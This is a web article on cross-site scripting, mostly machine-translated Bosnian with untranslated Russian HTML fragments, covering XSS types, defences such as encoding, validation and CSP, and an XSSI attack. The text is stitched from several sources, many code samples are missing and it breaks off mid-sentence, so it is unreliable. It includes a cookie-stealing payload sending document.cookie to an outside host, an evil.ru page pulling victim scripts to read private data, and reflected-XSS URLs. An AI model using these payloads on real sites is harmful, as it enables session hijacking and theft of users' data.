Pasivno xss. Easy Hack: Kako doći do podataka kroz uključivanje skriptova na više lokacija

I to je sveobuhvatan vodič za skriptiranje na više lokacija.

Prvi dio: pregled

Šta je XSS?

Skriptiranje na više lokacija ( engleski Cross-site scripting) Je napad ubrizgavanjem koda koji omogućava napadaču da izvrši zlonamjerni JavaScript u pretraživaču drugog korisnika.

Napadač ne napada direktno svoju žrtvu. Umjesto toga, iskorištava ranjivost na web stranici koju žrtva posjećuje i ubacuje zlonamjerni JavaScript kod. Pregledač žrtve prikazuje zlonamjerni JavaScript kao legitimni dio web stranice, a sama web stranica djeluje kao direktni saučesnik napadača.

Ubacivanje zlonamjernog JavaScript koda

Jedini način da napadač pokrene zlonamjerni JavaScript u pretraživaču žrtve je da ga ubaci u jednu od stranica koje žrtva preuzima sa web stranice. To je moguće ako web stranica dozvoljava korisnicima da unose podatke na svoje stranice, a napadač može ubaciti red koji će biti otkriven kao dio koda u pretraživaču žrtve.

Primjer ispod prikazuje jednostavnu skriptu na strani servera koja se koristi za prikaz posljednjeg komentara na web stranici:

print " "
print "Posljednji komentar:"
print database.latestComment
print ""

Skripta pretpostavlja da se komentar sastoji samo od teksta. Međutim, pošto je direktan korisnički unos omogućen, napadač bi mogao ostaviti ovaj komentar: "". Svaki korisnik koji posjeti stranicu sada će dobiti sljedeći odgovor:

zadnji komentar:

Kada korisnikov pretraživač učita stranicu, on će izvršiti sve, uključujući JavaScript sadržan u oznakama ... Ovo ukazuje da je samo prisustvo napadača koji ubacuje skriptu problem, bez obzira na to koji se određeni kod skripte zapravo izvršava.

Drugi dio: XSS napad

Učesnici XSS napada

Prije nego što detaljno opišemo kako XSS napad funkcionira, moramo identificirati aktere uključene u XSS napad. Generalno, postoje tri učesnika u XSS napadu: Web stranica, žrtva, i kreker.

Web stranica proizvodi HTML stranice za korisnike koji ih zatraže. U našim primjerima, nalazi se na http://website /.
- Baza podataka web stranica je baza podataka koja pohranjuje neke od podataka koje su korisnici unijeli na stranicama stranice.
Žrtva Je običan korisnik web stranice koji od njega traži stranice koristeći svoj pretraživač.
Napada Je napadač koji namjerava pokrenuti napad na žrtvu iskorištavanjem XSS ranjivosti na stranici.
- Cracker server Je web server pod kontrolom napadača s jedinom svrhom krađe povjerljivih informacija žrtve. U našim primjerima, nalazi se na http: // napadač /.

Primjer scenarija napada

Ova skripta će kreirati HTTP zahtjev na drugi URL koji će preusmjeriti pretraživač korisnika na server napadača. URL uključuje kolačiće žrtve kao parametar zahtjeva, kada HTTP zahtjev stigne na server napadača, napadač može izdvojiti ove kolačiće iz zahtjeva. Nakon što je napadač primio kolačiće, može ih koristiti za lažno predstavljanje žrtve i pokretanje naknadnog napada.

Od sada će se pozivati gornji HTML kod zlonamjerni niz ili zlonamjerna skripta... Važno je shvatiti da je niz sam po sebi zlonamjeran samo ako se na kraju obrađuje kao HTML u pretraživaču žrtve, što se može dogoditi samo ako postoji XSS ranjivost na web stranici.

Kako ovaj primjer napada funkcionira

Dijagram ispod prikazuje primjer napadača koji izvodi napad:

Napadač koristi jedan od obrazaca web stranice da ubaci zlonamjerni niz u bazu podataka web stranice.
Žrtva traži stranicu sa web stranice.
Stranica uključuje zlonamjerni niz iz baze podataka u odgovoru i šalje ga žrtvi.
Žrtvin pretraživač pokreće zlonamernu skriptu unutar odgovora, šaljući žrtvin kolačić na server napadača.

XSS tipovi

Cilj XSS napada je uvek da se izvrši zlonamerna JavaScript skripta u pretraživaču žrtve. Postoji nekoliko fundamentalno različitih načina za postizanje ovog cilja. XSS napadi se često kategoriziraju u tri tipa:

Pohranjeni (trajni) XSS gdje zlonamjerni niz potiče iz baze podataka web stranice.
Odraženi (nestabilan) XSS gdje se zlonamjerni niz stvara iz zahtjeva žrtve.
DOMs XSS gdje se ranjivost javlja u kodu na strani klijenta, a ne u kodu na strani servera.

Prethodni primjer prikazuje pohranjeni XSS napad. Sada ćemo opisati još dva tipa XSS napada: Reflected XSS i DOM XSS.

Reflected XSS

U reflektiranom XSS napadu, zlonamjerni niz je dio zahtjeva žrtve upućene web stranici. Stranica prihvata i ubacuje ovaj zlonamjerni niz u odgovor koji šalje nazad korisniku. Dijagram ispod ilustruje ovaj scenario:

Napadač prevari žrtvu da pošalje URL zahtjev web stranici.
Stranica uključuje zlonamjerni niz iz URL-a zahtjeva u odgovoru žrtve.
Žrtvin pretraživač izvršava zlonamernu skriptu sadržanu u odgovoru, šaljući žrtvin kolačić na server napadača.

Kako se uspješno odbraniti od XSS napada?

Odraženi XSS napad može izgledati bezopasno, jer zahtijeva od žrtve da pošalje zahtjev u njihovo ime koji sadrži zlonamjerni niz. Pošto niko neće dobrovoljno napasti sam sebe, čini se da ne postoji način da se napad izvede.

Kako se ispostavilo, postoje najmanje dva uobičajena načina da navedete žrtvu da pokrene reflektirani XSS napad na sebe:

Ako je korisnik određena osoba, napadač može poslati zlonamjerni URL žrtvi (na primjer, putem e-pošte ili instant messengera) i prevariti ih da otvore vezu za posjetu web stranici.
Ako je meta velika grupa korisnika, napadač bi mogao postaviti link na zlonamjerni URL (na primjer, na vlastitu web stranicu ili društvenu mrežu) i čekati da posjetitelji kliknu na vezu.

Obje ove metode su slične i obje mogu biti uspješnije korištenjem usluga skraćivanja URL-a za maskiranje zlonamjernog niza od korisnika koji bi ga mogli identificirati.

XSS u DOM-u

DOM XSS je varijanta i pohranjenog i reflektovanog XSS napada. U ovom XSS napadu, žrtvin pretraživač ne obrađuje zlonamjerni niz sve dok se stvarni JavaScript web stranice ne izvrši. Dijagram ispod ilustruje ovaj scenario za reflektovani XSS napad:

Napadač kreira URL koji sadrži zlonamjerni niz i šalje ga žrtvi.
Napadač prevari žrtvu da pošalje URL zahtjev web stranici.
Stranica prihvaća zahtjev, ali ne uključuje zlonamjerni niz u odgovoru.
Pregledač žrtve izvršava legitimnu skriptu sadržanu u odgovoru, zbog čega će zlonamjerna skripta biti umetnuta na stranicu.
Pregledač žrtve izvršava zlonamjernu skriptu umetnutu na stranicu, šaljući žrtvin kolačić na server napadača.

Koja je razlika između XSS-a u DOM-u?

U prethodnim primjerima pohranjenih i reflektiranih XSS napada, server ubacuje zlonamjerni skript na stranicu, koji se zatim prosljeđuje kao odgovor žrtvi. Kada pretraživač žrtve primi odgovor, pretpostavlja da je zlonamjerna skripta dio legitimnog sadržaja stranice i automatski je izvršava u vrijeme učitavanja stranice, baš kao i svaki drugi skript.

U primjeru DOM XSS napada, zlonamjerna skripta nije umetnuta kao dio stranice; jedina skripta koja se automatski izvršava tokom učitavanja stranice je legitimni dio stranice. Problem je u tome što ova legitimna skripta direktno koristi korisnički unos za dodavanje HTML-a na stranicu. Pošto je zlonamjerni niz umetnut u stranicu pomoću innerHTML-a, on se analizira kao HTML, uzrokujući izvršavanje zlonamjerne skripte.

Ova razlika je mala, ali veoma važna:

U tradicionalnom XSS-u, zlonamjerni JavaScript se izvršava pri učitavanju stranice kao dio HTML-a koji šalje server.
U slučaju XSS-a u DOM-u, zlonamjerni JavaScript se izvršava nakon što se stranica učita, uzrokujući da ta legitimna JavaScript stranica pristupi korisničkom unosu (koji sadrži zlonamjerni niz) na nesiguran način.

Kako XSS radi u DOM-u?

U prethodnom primjeru JavaScript nije potreban; server može sam generirati sav HTML. Kada bi kod na strani servera bio bez ranjivosti, web stranica ne bi bila ranjiva na XSS ranjivost.

Međutim, kako web aplikacije postaju naprednije, sve više i više HTML stranica se generiše pomoću JavaScripta na strani klijenta, a ne na serveru. U svakom trenutku, sadržaj se mora promijeniti bez osvježavanja cijele stranice, to je moguće pomoću JavaScripta. Konkretno, ovo je slučaj kada se stranica osvježi nakon AJAX zahtjeva.

To znači da XSS ranjivosti mogu biti prisutne ne samo na serverskoj strani koda vaše web lokacije, već i na JavaScript strani klijenta vaše stranice. Stoga, čak i sa potpuno sigurnim kodom na strani servera, klijentski kod možda i dalje nije siguran da uključi korisnički unos kada se DOM ažurira nakon što se stranica učita. Ako se to dogodi, tada će kod na strani klijenta dozvoliti XSS napad bez greške koda na strani servera.

XSS zasnovan na DOM-u možda neće biti vidljiv serveru

Postoji poseban slučaj DOM XSS napada u kojem se zlonamjerni niz nikada ne šalje serveru web stranice: to se događa kada je zlonamjerni niz sadržan u komadu identifikatora URL-a (bilo što nakon znaka #). Pretraživači ne šalju ovaj dio URL-a serveru, tako da se web stranici ne može pristupiti putem serverskog koda. Kod klijenta, međutim, ima pristup njemu, pa je moguće izvršiti XSS napad nesigurnom obradom.

Ovaj slučaj nije ograničen na identifikator fragmenta. Postoji i drugi korisnički unos koji je nevidljiv serveru, kao što su nove HTML5 funkcije kao što su LocalStorage i IndexedDB.

treći dio:
Sprečavanje XSS

Tehnike prevencije XSS

Podsjećamo, XSS je napad ubrizgavanjem koda: korisnički unos se pogrešno tumači kao zlonamjerni kod. Sigurno rukovanje unosom je potrebno da bi se spriječila ova vrsta ubacivanja koda. Za web programera, postoje dva fundamentalno različita načina za obavljanje sigurne obrade unosa:

Kodiranje je način koji omogućava korisniku da unese podatke samo kao podatke i ne dozvoljava da se pretraživač obrađuje kao kod.
Validacija je način filtriranja unosa korisnika tako da ga pretraživač tumači kao kod bez zlonamjernih naredbi.

Iako su ovo fundamentalno različite metode prevencije XSS-a, one imaju nekoliko zajedničkih stvari koje je važno razumjeti kada koristite bilo koju od njih:

Kontekst Sigurno rukovanje unosom treba da se radi drugačije u zavisnosti od toga gde se na stranici koristi korisnički unos. ulazni/odlazni Sigurna obrada unosa može se izvršiti ili kada vaša stranica primi ulaz (ulazni promet) ili neposredno prije nego što stranica umetne korisnički unos u sadržaj stranice (izlazni). Klijent/server Sigurna obrada unosa može se obaviti ili na strani klijenta ili na strani servera, od kojih je svaki potreban pod različitim okolnostima.

Prije nego što detaljno objasnimo kako funkcionira kodiranje i validacija, opisujemo svaku od ovih tačaka.

Rukovanje korisničkim unosom u kontekstu

Postoji mnogo konteksta na web stranici u kojima se može primijeniti korisnički unos. Za svaki od njih moraju se poštovati posebna pravila kako korisnički unos ne bi mogao "pobjeći" iz konteksta i ne bi se mogao protumačiti kao zlonamjerni kod. Sljedeći su najčešći konteksti:

Koliko su važni konteksti?

U svim opisanim kontekstima, XSS ranjivost može nastati ako je korisnički unos umetnut prije prvog kodiranja ili validacije. Napadač bi mogao ubaciti zlonamjerni kod jednostavnim umetanjem zatvarača za ovaj kontekst nakon kojeg slijedi zlonamjerni kod.

Na primjer, ako u nekom trenutku web stranica uključuje korisnički unos direktno u HTML atribut, napadač bi mogao ubaciti zlonamjernu skriptu započinjući njihov unos znakom navoda, kao što je prikazano u nastavku:

Ovo se moglo spriječiti jednostavnim uklanjanjem svih navodnika u korisničkom unosu i bilo bi u redu, ali samo u ovom kontekstu. Ako je unos umetnut u drugi kontekst, završni graničnik će biti drugačiji i ubacivanje će biti moguće. Iz tog razloga, sigurno rukovanje unosom mora uvijek biti prilagođeno kontekstu u koji će korisnički unos biti umetnut.

Rukovanje dolaznim/odlaznim korisničkim unosom

Instinktivno se može činiti da se XSS može spriječiti kodiranjem ili provjeravanjem svih korisničkih unosa čim ga naša stranica primi. Na ovaj način, svi zlonamjerni nizovi će već biti neutralizirani kad god su uključeni na stranicu, a skripte za generiranje HTML-a neće morati brinuti o sigurnom rukovanju korisničkim unosom.

Problem je u tome što, kao što je ranije opisano, korisnički unos može biti umetnut u više konteksta na stranici. I ne postoji jednostavan način da se odredi kada korisnički unos dolazi u kontekst – kako će na kraju biti umetnut, a isti korisnički unos često treba da se ubaci u različite kontekste. Oslanjajući se na rukovanje dolaznim unosom kako bismo spriječili XSS, stvaramo vrlo krhko rješenje koje će biti sklono greškama. (Naslijeđeni PHP magični citati su primjer takvog rješenja.)

Umjesto toga, rukovanje izlaznim unosom bi trebalo da bude vaša glavna linija odbrane od XSS-a jer može uzeti u obzir specifičan kontekst unosa korisnika koji će biti umetnuti. U određenoj mjeri, ulazna validacija se može koristiti za dodavanje sekundarnog sloja zaštite, ali o tome kasnije.

Gdje je moguće bezbedno rukovati korisničkim unosom

U većini modernih web aplikacija, korisničkim unosom se rukuje i na kodu na strani servera i na kodu na strani klijenta. Kako bi se zaštitili od svih tipova XSS-a, sigurna obrada unosa mora biti obavljena u kodu na strani servera i kodu na strani klijenta.

Kako bi se zaštitili od tradicionalnog XSS-a, sigurno rukovanje unosom mora se obaviti u kodu na strani servera. Ovo se radi pomoću nekog jezika koji server podržava.
Da bi se zaštitili od XSS napada u DOM-u, gdje server nikada ne prima zlonamjerni niz (kao što je napad fragmenta ID-a opisan ranije), sigurno rukovanje unosom mora se obaviti u kodu na strani klijenta. Ovo se radi pomoću JavaScripta.

Sada kada smo objasnili zašto je kontekst bitan, zašto je važna razlika između ulazne i izlazne obrade unosa i zašto se sigurna obrada unosa mora obaviti i na strani klijenta i na strani servera, možemo nastaviti s objašnjavanjem kako dvije vrste sigurne obrade obrada ulaza (kodiranje i validacija) se zapravo obavlja.

Kodiranje

Kodiranje je izlaz iz situacije u kojoj je neophodno da pretraživač tumači korisnički unos samo kao podatak, a ne kao kod. Najpopularnija vrsta kodiranja u web razvoju je HTML maskiranje, koje pretvara znakove kao što su npr < i > v < i > respektivno.

Sljedeći pseudokod je primjer kako se korisnički unos (korisnički unos) može kodirati korištenjem HTML maskiranja, a zatim umetnuti na stranicu pomoću skripte na strani servera:

print " "
print "Posljednji komentar:"
print encodeHtml (userInput)
print ""

Ako korisnik unese sljedeći red, rezultirajući HTML će izgledati ovako:

zadnji komentar:

Budući da su svi znakovi sa posebnim značenjem maskirani, pretraživač neće analizirati nijedan dio korisničkog unosa poput HTML-a.

Kodiranje na strani klijenta i servera

Prilikom izvršavanja kodiranja na strani klijenta uvijek se koristi JavaScript, koji ima ugrađene funkcije koje kodiraju podatke za različite kontekste.

Kada radite kodiranje u kodu na strani servera, oslanjate se na funkcije dostupne u vašem jeziku ili okviru. Zbog velikog broja dostupnih jezika i okvira, ovaj vodič neće pokriti detalje kodiranja na bilo kojem određenom serverskom ili framework jeziku. Međutim, karakteristike JavaScript kodiranja na strani klijenta se također koriste prilikom pisanja koda na strani servera.

Kodiranje na strani klijenta

Kada kodirate korisnički unos na strani klijenta pomoću JavaScript-a, postoji nekoliko ugrađenih metoda i svojstava koja automatski kodiraju sve podatke u stil osjetljiv na kontekst:

Posljednji gore spomenuti kontekst (vrijednosti u JavaScriptu) nije uključen u ovu listu jer JavaScript ne pruža ugrađeni način za kodiranje podataka koji bi bili uključeni u JavaScript izvorni kod.

Ograničenja kodiranja

Čak i kada se kodira, moguće je koristiti zlonamjerne nizove u nekim kontekstima. Najbolji primjer ovoga je kada se korisnički unos koristi za pružanje URL-a, kao u primjeru ispod:

document.querySelector ("a"). href = userInput

Iako navedena vrijednost u svojstvu href elementa automatski ga kodira tako da postaje ništa drugo do vrijednost atributa, to samo po sebi ne sprječava napadača da ubaci URL koji počinje sa "javascript:". Kada se klikne na vezu, bez obzira na konstrukciju, ugrađeni JavaScript unutar URL-a će se izvršiti.

Kodiranje također nije efikasno rješenje kada želite da korisnici mogu koristiti neke od HTML kodova na stranici. Primjer bi bila stranica korisničkog profila na kojoj korisnik može koristiti prilagođeni HTML. Ako je ovaj obični HTML kodiran, stranica profila može se sastojati samo od običnog teksta.

U ovakvim situacijama kodiranje mora biti dopunjeno validacijom, o čemu ćemo se u nastavku upoznati.

Validacija

Validacija je čin filtriranja korisničkog unosa tako da se uklone svi zlonamjerni dijelovi bez potrebe za uklanjanjem cijelog koda u njemu. Jedna od najčešće korištenih vrsta provjere valjanosti u web razvoju omogućava vam korištenje nekih HTML elemenata (npr. i ), ali zabranjujući druge (npr.

Uz pravilno definiranu CSP politiku, pretraživač ne može učitati i izvršiti zlonamjerni ‑ script.js jer http: // napadač / nije naveden kao pouzdan izvor. Iako sajt nije mogao pouzdano da obrađuje unos korisnika, u ovom slučaju CSP politika je sprečila ranjivost i bilo kakvu štetu.

Čak i ako je napadač ubacio kod u kod skripte umjesto da se povezuje na eksternu datoteku, pravilno konfigurirana CSP politika bi također onemogućila ubrizgavanje u JavaScript kod, sprječavajući ranjivost i uzrokujući bilo kakvu štetu.

Kako da omogućim CSP?

Podrazumevano, pretraživači ne koriste CSP-ove. Da biste omogućili SCP na vašoj web stranici, stranice moraju sadržavati dodatno HTTP zaglavlje: Sadržaj ‑ Sigurnost ‑ Politika. Svaka stranica koja sadrži ovo zaglavlje će primijeniti sigurnosne politike u vrijeme učitavanja od strane pretraživača, pod uslovom da pretraživač podržava CSP.

Budući da se sigurnosna politika šalje sa svakim HTTP odgovorom, moguće je na serveru pojedinačno postaviti politiku za svaku stranicu. Ista politika se može primijeniti na cijelu web stranicu umetanjem istog CSP zaglavlja u svaki odgovor.

Vrijednost u zaglavlju Content-Security-Policy sadrži niz koji definira jednu ili više sigurnosnih politika koje će se primijeniti na vašu web-lokaciju. Sintaksa za ovu liniju će biti opisana kasnije.

Primeri naslova u ovom odeljku koriste prelome redova i uvlačenje radi jasnoće; ne bi trebalo da se pojavljuju u ovom naslovu.

CSP sintaksa

Sintaksa za CSP zaglavlje je sljedeća:

Sadržaj ‑ Sigurnost ‑ Politika:
direktiva izvorni izraz, izvorni izraz, ...;
direktiva ...;
...

Ova sintaksa ima dva elementa:

Direktive koji su nizovi koji označavaju tip resursa preuzetog sa date liste.

Izvorni izrazi je model koji opisuje jedan ili više servera sa kojih se mogu učitavati resursi.

Za svaku direktivu, podaci u izvornom izrazu određuju koji se izvori mogu koristiti za učitavanje resursa odgovarajućeg tipa.

Direktive

Sljedeće direktive se mogu koristiti u CSP zaglavlju:

povezati ‑ src

font-src

frame-src

img ‑ src

media-src

object-src

script-src

style-src

Dodatno ovome, posebna default-src direktiva se može koristiti za obezbjeđivanje zadane vrijednosti za sve direktive koje nisu uključene u zaglavlje.

Izvorni izraz

Sintaksa za kreiranje izvornog izraza je sljedeća:

protokol: // ime-hosta: broj-porta

Ime hosta može početi sa *, što znači da će bilo koja poddomena navedenog imena hosta biti razriješena. Isto tako, broj porta se može predstaviti kao *, što znači da će svi portovi biti dozvoljeni. Osim toga, protokol i broj porta se mogu preskočiti. Ako nije naveden nijedan protokol, politika će zahtijevati da se svi resursi učitaju pomoću HTTPS-a.

Pored gornje sintakse, izvorni izraz može alternativno biti jedna od četiri ključne riječi sa posebnim značenjem (uključeni citati):
"none" onemogućava resurse. "self" rješava resurse sa hosta na kojem se web stranica nalazi. "unsafe-inline" rješava resurse sadržane na stranici kao inline
Postoje dvije vrste XSS ranjivosti - pasivne i aktivne.

Aktivna ranjivost opasnije, pošto napadač ne treba da namami žrtvu pomoću posebnog linka, samo treba da ubaci kod u bazu podataka ili neki fajl na serveru. Tako svi posjetioci stranice automatski postaju žrtve. Može se integrirati, na primjer, korištenjem SQL injekcije. Stoga ne biste trebali vjerovati podacima pohranjenim u bazi podataka, čak i ako su obrađeni tokom umetanja.

Primjer pasivna ranjivost možete pronaći na samom početku članka. Ovdje je već potreban društveni inženjering, na primjer, važno pismo administracije stranice sa zahtjevom da provjerite postavke vašeg računa nakon vraćanja iz sigurnosne kopije. U skladu s tim, morate znati adresu žrtve ili jednostavno dogovoriti slanje neželjene pošte ili objavu na nekom forumu, a čak i ne činjenicu da će žrtve biti naivne i kliknuti na vaš link.

Štaviše, i POST i GET parametri mogu biti podložni pasivnoj ranjivosti. Sa POST parametrima, naravno, morate ići na neke trikove. Na primjer, preusmjeravanje s web stranice napadača.

Stoga je GET ranjivost malo opasnija, jer žrtvi je lakše uočiti pogrešan domen nego opcioni parametar (iako se url može u potpunosti kodirati).

Krađa kolačića

Ovo je najčešće citirani primjer XSS napada. U kolačićima, stranice ponekad pohranjuju neke vrijedne informacije (ponekad čak i korisničko ime i lozinku (ili njegov hash) korisnika), ali najopasnija je krađa aktivne sesije, stoga ne zaboravite kliknuti na link "Izlaz" na web lokacije, čak i ako se radi o kućnom računaru. Srećom, na većini resursa životni vijek sesije je ograničen.
Var ímg = nova slika (); ímg.srs = "http: //site/xss.php?" + document.cookie;
Stoga smo uveli ograničenja domena na XMLHttpRequest, ali se napadač ne boji, jer postoji , <img>, <script>, background:url(); и т.п.</p> <h3>Кража данных из форм</h3> <p>Ищем форму через, например, getElementById и отслеживаем событие onsubmit. Теперь, перед отправкой формы, введенные данные отправляются также и на сервер злоумышленника.</p> <p>Этот тип атаки чем-то напоминает фишинг, только используется не поддельный сайт, а реальный, чем вызывается большее доверие жертвы.</p> <h3>DDoS-атака (распределенная атака типа «отказ в обслуживании»)</h3> <p>XSS-уязвимость на многопосещаемых ресурсах может быть использована для проведения DDoS-атаки. Суть проста - много запросов, которые не выдерживает атакуемый сервер.<br> Собственно отношение к XSS имеет косвенное, поскольку скрипты могут и не использоваться вовсе, достаточно конструкции вида:</p><p> <img src='https://i2.wp.com/site.com/' loading=lazy loading=lazy> </p><h2>В чем опасность XSS?</h2> <p>Как можно защитить свой сайт от XSS? Как проверить код на наличие уязвимости? Существуют технологии вроде Sucuri Firewall, специально разработанные для того, чтобы избежать подобных атак. Но если вы разработчик, вы, безусловно, захотите узнать подробнее, как идентифицировать и устранить XSS-уязвимости.</p> <p>Об этом мы поговорим в следующей части статьи, посвященной XSS.</p> <p>Про возможность получения различной информации со сторонних сайтов с помощью простой атаки - Cross Site Scripting Inclusion (XSSI).</p> <p>Если ты читаешь Easy Hack систематически, то, наверное, уже хорошо знаком с Same Origin Policy (SOP), мы к нему часто возвращаемся. Из-за SOP возможность взаимодействия между двумя «сайтами» очень ограничена. Но так как задача получения и оправки информации на одном сайте с другого возникает часто, то были внедрены различные методы для «смягчения» политики и организации взаимодействия. Например, такие, как CORS или crossdomain.xml. Один из более старых методов - подгрузка JavaScript с другого домена через тег <script> . SOP нас здесь ничем не ограничивает: можно указать практически произвольное месторасположение.</p><p>К примеру, есть хост атакующего evil.ru и сайт жертвы - victim.com. На evil.ru мы можем положить файл HTML и сослаться на любой скрипт у жертвы:</p><p> <script src="http://victim.com/any_script_.js"></script> </p><p>Kada korisnik uđe na web lokaciju napadača, pretraživač će preuzeti i pokrenuti JS sa žrtve.com, ali u kontekstu evil.ru SOP-a. To znači da ćemo iz JS samog napadača moći pristupiti podacima (ne svim) JS sa servera žrtve.</p> <p>Na primjer, JS sadržaj sa stranice žrtve (http://victim.com/any_script_.js):</p><p>Var a = "12345";</p><p>Zatim, na web stranici napadača možemo dobiti vrijednost varijable:</p><p> <script src="http://victim.com/any_script_.js"></script> <script>console.log(a);</script> </p><p>Ideja rada je jednostavna kao aluminijski kotlić.</p> <p>Zapravo, mogućnost učitavanja statičkog JS-a sa drugih lokacija ne predstavlja više problema za lokaciju žrtve od učitavanja slike.</p> <p>Problemi mogu nastati kada se JS generira dinamički, odnosno kada se sadržaj JS skripte mijenja na osnovu podataka iz kolačića, ovisno o tome koji korisnik mu pristupa. Na primjer, neke "kritične" informacije se pohranjuju u JS: lični podaci (e-pošta, korisničko ime na žrtvi) ili tehničke informacije (anti CSRF tokeni).</p> <p>Ali, kao što znamo, prilikom učitavanja skripte kroz tag<script> браузер пользователя автоматически отправляет cookie пользователя. Сложив эти факты, мы получаем возможность получать информацию о любом пользователе, который зашел на сайт атакующего и при этом залогинен на сайте-жертве.</p> <p>Что же мы можем узнать? Глобальные переменные и результаты работы глобальных функций. К сожалению, доступа к внутренним переменным/функциям нам не получить (хотя, возможно, кто-то найдет способ сделать и это).</p><p>Function test(){ return "private data frm function"; } </p><p>Такая атака выглядит возможной, но кажется, что она слишком проста и не должна быть распространенной. Этим и интересна презентация на Black Hat. Исследователи проанализировали 150 популярных сайтов и обнаружили, что в той или иной мере уязвима треть из них. Такая статистика заставляет взглянуть на проблему чуть более пристально.</p> <p>Была выявлена и еще одна закономерность. Content Security Policy становится все более распространенной. Как ты знаешь, с ней мы можем указать, с каких доменов может быть подгружен тот или иной ресурс. Например, можно сказать исполнять JS только с того же ресурса. Кроме того, лучшие практики настройки CSP подразумевают запрет на запуск inline JS (то есть кода, который находится прямо в HTML, а не подгружен из JS-файла).</p> <p>Однако перенос inline в файлы может быть сделан с костылями и на скорую руку - то есть посредством динамически генерируемых скриптов. Так как CSP никак не влияет на XSSI, мы опять-таки можем проводить наши атаки. Вот такая вот bad practice.</p> <p>Межсайтовый скриптинг (XSS) - это уязвимость, которая заключается во внедрении кода, исполняемого на стороне клиента (JavaScript) в веб-страницу, которую просматривают другие пользователи.</p> <p>Уязвимость возникает из-за недостаточной фильтрации данных, которые пользователь отправляет для вставки в веб-страницу. Намного проще понять на конкретном пример. Вспомните любую гостевую книгу - это программы, которые предназначены для принятия данных от пользователя и последующего их отображения. Представим себе, что гостевая книга никак не проверяет и не фильтрует вводимые данные, а просто их отображает.</p> <p>Можно набросать свой простейший скрипт (нет ничего проще, чем писать плохие скрипты на PHP - этим очень многие занимаются). Но уже предостаточно готовых вариантов. Например, я предлагаю начать знакомство с Dojo и OWASP Mutillidae II. Там есть похожий пример. В автономной среде Dojo перейдите в браузере по ссылке: http://localhost/mutillidae/index.php?page=add-to-your-blog.php</p> <p>Если кто-то из пользователей ввёл:</p><p>То веб-страница отобразит:</p><p>Привет! Нравится твой сайт. </p><p>А если пользователь введёт так:</p><p>Привет! Нравится твой сайт.<script>alert("Pwned")</script> </p><p>Tada će biti prikazano ovako:</p> <p><img src='https://i2.wp.com/hackware.ru/wp-content/uploads/2016/06/x02-6.jpg.pagespeed.ic.1-A3eqySoq.jpg' width="100%" loading=lazy loading=lazy></p> <p>Preglednici pohranjuju mnoge kolačiće na velikom broju stranica. Svaka stranica može primati samo kolačiće koje je sama sačuvala. Na primjer, example.com je pohranio neke kolačiće u vaš pretraživač. Ako posjetite stranicu another.com, ova stranica (klijentske i serverske skripte) ne može pristupiti kolačićima koje je pohranio example.com.</p> <p>Ako je stranica example.com ranjiva na XSS, onda to znači da možemo na ovaj ili onaj način u nju ubaciti JavaScript kod, a taj će se kod izvršiti u ime stranice example.com! One. ovaj kod će, na primjer, dobiti pristup kolačićima stranice example.com.</p> <p>Mislim da se svi sjećaju da se JavaScript izvršava u pretraživačima korisnika, tj. u prisustvu XSS-a, ubrizgani zlonamjerni kod dobija pristup podacima korisnika koji je otvorio stranicu web stranice.</p> <p>Ubačeni kod može učiniti sve što JavaScript može, naime:</p> <ul><li>pristupa kolačićima stranice koju pregledavate</li> <li>može napraviti bilo kakve promjene u izgledu stranice</li> <li>pristupa međuspremniku</li> <li>može ubaciti JavaScript programe, na primjer, key loggere (presretače pritisnutih tipki)</li> <li>kuka na BeEF</li> <li>i sl.</li> </ul><p>Najjednostavniji primjer kolačića:</p><p> <script>alert(document.cookie)</script> </p><p>zapravo, <b>uzbuna</b> koristi se samo za XSS detekciju. Pravi zlonamjerni teret izvodi prikrivene radnje. Tajno komunicira sa udaljenim serverom napadača i na njega prenosi ukradene podatke.</p> <h2>XSS pogledi <br></h2> <p>Najvažnija stvar koju treba razumjeti o tipovima XSS-a je da su:</p> <ul><li>Pohranjeno (uporno)</li> <li>Odraženo (nestalno)</li> </ul><p>Primjer konstanti:</p> <ul><li>Posebno kreirana poruka knjige gostiju (komentar, poruka na forumu, profil) koju je unio napadač i sačuvana na serveru preuzima se sa servera svaki put kada korisnici zatraže da se ova stranica prikaže.</li> <li>Napadač je dobio pristup serverskim podacima, na primjer, putem SQL injekcije, i ubacio zlonamjerni JavaScript kod (sa keyloggerima ili sa BeEF-om) u podatke prikazane korisniku.</li> </ul><p>Primjer volatila:</p> <ul><li>Na sajtu postoji pretraga, koja zajedno sa rezultatima pretrage pokazuje nešto poput „Tražili ste: [string za pretragu]“, a podaci nisu pravilno filtrirani. Budući da se takva stranica prikazuje samo onima koji imaju link ka njoj, napad neće funkcionirati sve dok napadač ne pošalje link drugim korisnicima stranice. Umjesto slanja linka žrtvi, možete koristiti postavljanje zlonamjerne skripte na neutralnu stranicu koju je žrtva posjetila.</li> </ul><p>Oni također razlikuju (neki kao neka vrsta nestabilnih XSS ranjivosti, neki kažu da ova vrsta može biti vrsta postojanog XSS-a):</p> <ul><li>DOM modeli</li> </ul><h2>Karakteristike DOM-baziranog XSS-a <br></h2> <p>Jednostavno rečeno, možemo vidjeti zlonamjerni kod "običnog" nepostojanog XSS-a kada otvorimo HTML kod. Na primjer, veza se formira ovako:</p><p>Http://example.com/search.php?q= "/><script>alert(1)</script> </p><p>A kada otvorimo izvorni HTML kod, vidimo nešto ovako:</p><p> <div class="m__search"> <form method="get" action="/search.php"> <input type="text" class="ui-input query" name="q" value=""/><script>alert(1)</script>" /> <button type="submit" class="ui-button">Nađi</button> </form> </p><p>I DOM XSS mijenja DOM strukturu, koja se formira u pretraživaču u hodu, a zlonamjerni kod možemo vidjeti samo kada pogledamo formiranu DOM strukturu. Ovo ne mijenja HTML. Uzmimo sljedeći kod kao primjer:</p><p> <!DOCTYPE html> <html> <head> <title>sajt ::: DOM XSS</title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> </head> <body> <div id="default">Dogodila se greška ...</div> <script> function OnLoad() { var foundFrag = get_fragment(); return foundFrag; } function get_fragment() { var r4c = "(.*?)"; var results = location.hash.match(".*input=token(" + r4c + ");"); if (results) { document.getElementById("default").innerHTML = ""; return (unescape(results)); } else { return null; } } display_session = OnLoad(); document.write("Your session ID was: " + display_session + "<br><br>") </script> </body> </html> </p><p>Zatim ćemo u pretraživaču vidjeti:</p> <p><img src='https://i2.wp.com/hackware.ru/wp-content/uploads/2016/06/x04-4.jpg.pagespeed.ic.NGlOliWXIq.jpg' width="100%" loading=lazy loading=lazy></p> <p>Izvorni kod stranice:</p> <p><img src='https://i1.wp.com/hackware.ru/wp-content/uploads/2016/06/x05-3.jpg.pagespeed.ic.qvLGDO0bJf.jpg' width="100%" loading=lazy loading=lazy></p> <p>Formiramo adresu na sljedeći 